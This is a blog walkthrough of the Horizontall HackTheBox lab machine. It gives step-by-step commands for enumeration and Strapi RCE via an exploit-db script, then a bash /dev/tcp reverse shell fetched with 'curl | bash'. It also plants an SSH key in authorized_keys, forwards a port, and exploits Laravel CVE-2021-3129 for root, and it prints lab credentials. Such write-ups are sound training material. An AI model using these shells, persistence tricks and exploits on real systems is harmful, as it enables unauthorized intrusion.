Horizontall HackTheBox WalkThrough

Horizontall HackTheBox WalkThrough

This is Horizontall HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Horizontall HackTheBox machine. Before starting let us know something about this box. It is a Linux OS box with IP address and difficulty level easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and confirm your connectivity with Horizontall machine by pinging its IP If all goes correct then it’s time to start hacking.

As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap (a popular Port Scanner) for this task and the result is given below: –


$ sudo nmap -sC -sV -p- -oN full-port.nmap
Nmap scan result during Horizontall HackTheBox WalkThrough

Full port scan with nmap revealed port 22 and 80 as open. OpenSSH 7.6p1 is running on port 22 and nginx 1.14.0 web server is running on port 80. Googled for vulnerabilities in OpenSSH and Nginx but no any useful vulnerability found. Also, nmap script http-title revealed a virtual host horizontall.htb. So, before going further for any enumeration let us add horizontall.htb to our hosts file, hosts file is located in the directory /etc/.

Hosts File After Modification 1

$ cat /etc/hosts
Hosts File after modification 1

On visiting the URL http://horizontall.htb/ got simple UI saying Build website using HT. After checking the source-code and other stuffs on the website, could not find any useful information.  

Horizontall htb box web page

So moved forward for Directory and Virtual Host bruteforcing. Directory bruteforcing with $ dirsearch and wordlist directory-list-2.3-medium.txt couldn’t find any useful file and folder. But, Virtual Host bruteforcing with $ ffuf and wordlist subdomains-top1million-110000.txt found a virtual host api-prod.horizontall.htb.

$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c
Vhost bruteforcing on Horizontall machine during Horizontall HackTheBox WalkThrough

Let us add api-prod.horizontall.htb to our hosts file.

Hosts File After Modification 2

$ cat /etc/hosts
Hosts file after modification 2

Ongoing to the URL http://api-prod.horizontall.htb/ found a simple page containing Welcome.

Api-pro-horizontall-htb web page

Then directory brute forced on this subdomain using $ dirsearch and wordlist directory-list-2.3-medium.txt.

$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100
Directory bruteforcing result during Horizontall HackTheBox WalkThrough

Directory bruteforcing revealed admin & reviews pages. Ongoing to http://api-prod.horizontall.htb/admin/ found the login page of strapi CMS.

STRapi Login page

Then I googled for the version of strapi CMS, vulnerabilities associated with them and how to find the version of strapi CMS being used.  Luckily, got this link which shows how to find the version of strapi CMS. Following this link http://api-prod.horizontall.htb/admin/strapiVersion I found that the installed version of strapi is 3.0.0-beta.17.4

Strapi Version found during Horizontall HackTheBox WalkThrough

Then a quick googling on the vulnerabilities of strapi CMS revealed that version 3.0.0-beta.17.4 is vulnerable to Unauthenticated Remote Code Execution and its public exploit is also present. Check this link on exploit-db.

Tip: It is always a good idea to check the vulnerabilities associated with them whenever you get any software or framework version during enumeration phase in any CTF.

StrAPI CMS Remote Code Execution exploit on exploit-db

Confirming RCE

To confirm Remote Code Execution on Horizontall machine follow the steps below.

$ wget https://www.exploit-db.com/download/50239 -O exploit.py
$ python3 exploit.py http://api-prod.horizontall.htb
$> whoami

After successful exploitation we get an Authenticated JSON web token and credential admin : SuperStrongPassword1.

Running Strapi CMS exploit on api-prod-horizontall vhost

We can use this credential to login at URL http://api-prod.horizontall.htb/admin/. Since it is a Blind RCE that’s why we can’t see any output on screen. We can confirm it from above screenshot.

Checking Connectivity with Kali Machine

To confirm whether we can get a reverse shell on our Kali machine, we need to check the connectivity of horizontall machine with our Kali machine. For checking the connectivity, I pinged my Kali box from horizontall machine and it was pinging.

$> ping -c 3
$ sudo tcpdump -i tun0 icmp
Checking connectivity with our Kali machine through horizontall machine

Now its time to get reverse shell using some one liner. You can get a list of one liner from this link.

Getting User Shell

To get reverse shell follow the given steps :

On Kali Machine

In window 1
$ echo '#!/usr/bin/bash'>shell.sh
$ echo 'bash -i >& /dev/tcp/ 0>&1'>>shell.sh # Don’t forget to replace the IP with your Kali machine IP
$ cat shell.sh
$ sudo python3 -m http.server 80
In window 2
$ nc -nvlp 9001
$ whoami && id

On Horizontall Machine

$> curl | bash
Getting user shell during Horizontall HackTheBox WalkThrough

We have successfully got user shell. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
$ CTRL + Z # to background the shell
$ stty raw -echo
$ fg # then 2 times enter to foreground the shell
$ export TERM=xterm-256color
$ stty -a | head -n1
$ stty rows 43 columns 174
Shell upgrade during Horizontall HackTheBox WalkThrough

Capture User Flag

$ cat /home/developer/user.txt
Capture user flag during Horizontall HackTheBox WalkThrough

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I go for manual enumeration.

Finding PrivEsc Vector

$ ss -lnpt command revealed that ports 3306, 1337 and 8000 are listening locally. There must be some services running over them.

ss -lnpt output

MySQL server is running over port 3306. I tried to login into the server using the credential developer : #J!:F9Zt2uI. I got this credential from the file database.json which is present in the directory /opt/strapi/myapi/config/environments/development/. But there was no any useful information present in the databases.

database.json file content found during Horizontall HackTheBox WalkThrough

When I tried to access port 1337 it didn’t respond. After accessing the service on port 8000 through the URL found that the application running over this service is made of Laravel v8.

$ curl | grep -A3 -B4 -i "Laravel v8"
Result of curl command on horizontall htb box

Soon I got information about the Laravel immediately, I searched for the vulnerability and its exploit. After some research found that Laravel (<=v8.4.2) is vulnerable to Remote Code Execution when debug mode is enabled. For more info about this vulnerability check the CVE CVE-2021-3129. After checking the exploit at this URL found that it downloads phpgcc library from the GitHub while it executes on vulnerable machine. Since HackTheBox doesn’t have access to external Internet, so we can’t execute this exploit on horizontall machine.  For this we have to Local Port Forward port 8000 to our Kali machine, only then we can execute the exploit. Check last 5th line of code in below screenshot.

Exploit code

We will use SSH for Local Port Forwarding. But we don’t have any SSH credential yet so we need to create one.

Since we have access to strapi user we can introduce our SSH public key from our id_rsa.pub file into the authorized_keys file of user strapi and then we can connect to horizontall machine using our SSH private key viz. id_rsa. So let us create a pair of RSA key using the command $ ssh-keygen.

On Kali Machine

$ ssh-keygen
$ cat ~/.ssh/id_rsa.pub
SSH-Keygen command result on my Kali machine during Horizontall HackTheBox WalkThrough

On Horizontall Machine

$ pwd
$ mkdir .ssh
$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqvcT8ZYbpNsiqZ53qceUd1JbnaugzrTrdFJm1Jpfn0YBdcFxMM4SLuLEANZ5kUJWS147CAgAbe2ufJT7HOPi09jjB9d21DcfcsiZA7NJ9rJU0g1PWXwUm1WyZIgoRGh3cOw+JnnampekaowAJyIDWZnBjSUjoybBGL8EfjdDXXTxoim/b8RP6vpjwJYrTJiuWFNDyHeIej4WCklr3TwuiAy7KZ67mn8ICRpNpdbndPwWajJbHKe2Ua3KX/gnk5wJOF1tCxtdZQ4qFPwvg4I5ZirIQDsfJ/JoperybYknHMiAGoL2GagXzwBuj6jgoFRDzkRQ9sT5lYZ5GObAijWEuThL+VclpRGb+LreCy13fLCb3upRT7tZFx7KPB0oSgpWU/RLvffoeKweKoLdSD8eIjbI/mOdbnNJVqAz/8HrbvtfcIfmDFCB8XcS7YhpItZFq6wPLhNr+xJuutTbVZcAXCHP4aVEtKAX2Q29tmNBcAgfDa2cdcKQXFFlbWikufLE= deepak@kali">/opt/strapi/.ssh/authorized_keys
$ cat /opt/strapi/.ssh/authorized_keys
Adding id_rsa.pub key to strapi user

We have successfully transferred our public key to authorized_keys of user strapi on horizontall.

Local Port Forwarding

Let us login into the strapi SSH account using our id_rsa key and Local Port Forward port 8000 to our kali machine.

$ chmod 400 ~/.ssh/id_rsa
$ ssh -i ~/.ssh/id_rsa -L 8000: [email protected]

 We can check the forwarded port using the command $ ss -lnpt

Local Port Forwarding during Horizontall HackTheBox WalkThrough

Now we can access the service which is running over port 8000 on horizontall machine to port 8000 on our Kali machine using the URL http://localhost:8000/.

Localhost service running on port 8000

When I tried to escalate the privilege using this exploit I could easily perform privilege escalation. So here out potential PrivEsc vector is Privilege Escalation by exploiting Vulnerable Software Version.

Getting Root by Privilege Escalation

To perform Privilege Escalation, follow the steps given at this URL or follow below steps.

$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git
$ cd CVE-2021-3129_exploit
$ chmod +x exploit.py
$ ./exploit.py http://localhost:8000 Monolog/RCE1 id
Privilege Escalation on Horizontall HTB machine during Horizontall HackTheBox WalkThrough

We can clearly see that we have successfully escalated the privilege to root as the output of $ id command is

uid=0(root) gid=0(root) groups=0(root).

Capture Root Flag

Let us capture root flag.

$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'
Capture Root flag during Horizontall HackTheBox WalkThrough

This was how I rooted Horizontall HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected]

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/